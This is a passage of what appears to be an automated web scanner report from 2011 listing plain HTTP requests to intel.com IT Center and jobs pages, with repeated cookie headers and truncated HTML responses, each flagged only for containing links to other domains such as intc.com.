s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:19:46 GMT Connection: close Connection: Transfer-Encoding Content-Length: 41858
...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en_us" xml:lang="en"> <h ...[SNIP]... <li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a> ...[SNIP]...
The response contains the following link to another domain:
http://www.intc.com/index.cfm?iid=ftr+invrel
Request
GET /itcenter/system/transactional/index.htm?iid=subhdr+itc_transactdev HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:19:50 GMT Connection: close Connection: Transfer-Encoding Content-Length: 41364
...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en_us" xml:lang="en"> <h ...[SNIP]... <li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a> ...[SNIP]...
The response contains the following link to another domain:
http://www.intc.com/index.cfm?iid=ftr+invrel
Request
GET /itcenter/system/workstation/index.htm?iid=subhdr+itc_workstation HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:19:47 GMT Connection: close Connection: Transfer-Encoding Content-Length: 40517
...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en_us" xml:lang="en"> <h ...[SNIP]... <li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a> ...[SNIP]...
GET /itcenter/tool/vpro/index.htm?iid=subhdr+itc_vpro HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:19:51 GMT Connection: close Connection: Transfer-Encoding Content-Length: 45819
The response contains the following links to other domains:
http://www.intc.com/index.cfm?iid=ftr+invrel
http://www.opendatacenteralliance.org/
Request
GET /itcenter/topics/cloud/index.htm?iid=gg_work+home_cloud HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:19:42 GMT Connection: close Connection: Transfer-Encoding Content-Length: 46228
...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en_us" xml:lang="en_us"> ...[SNIP]... <p>As a technical advisor to the <a href="http://www.opendatacenteralliance.org" title="Open Data Center Alliance">Open Data Center Alliance</a> ...[SNIP]... </p> <a href="http://www.opendatacenteralliance.org" title="Open Data Center Alliance" target="_blank" >Sign up now ></a> ...[SNIP]... <li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a> ...[SNIP]...
The response contains the following link to another domain:
http://www.intc.com/index.cfm?iid=ftr+invrel
Request
GET /itcenter/topics/index.htm?iid=subhdr+itc_alltopics HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:19:45 GMT Connection: close Connection: Transfer-Encoding Content-Length: 47102
...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en_us" xml:lang="en"> <h ...[SNIP]... <li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a> ...[SNIP]...
The response contains the following link to another domain:
http://www.intc.com/index.cfm?iid=ftr+invrel
Request
GET /itcenter/topics/performance/index.htm?iid=subhdr+itc_performance HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:19:42 GMT Connection: close Connection: Transfer-Encoding Content-Length: 56407
...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en_us" xml:lang="en_us"> ...[SNIP]... <li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a> ...[SNIP]...
GET /itcenter/topics/savings/index.htm?iid=subhdr+itc_savings HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:19:43 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44352
The response contains the following link to another domain:
http://www.intc.com/index.cfm?iid=ftr+invrel
Request
GET /itcenter/topics/virtualization/index.htm?iid=subhdr+itc_virtualization HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:19:45 GMT Connection: close Connection: Transfer-Encoding Content-Length: 57241
...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en_us" xml:lang="en_us"> ...[SNIP]... <li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a> ...[SNIP]...
GET /jobs/index.htm?iid=gg_about+intel_jobs HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:20:17 GMT Connection: close Connection: Transfer-Encoding Content-Length: 56125
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head>
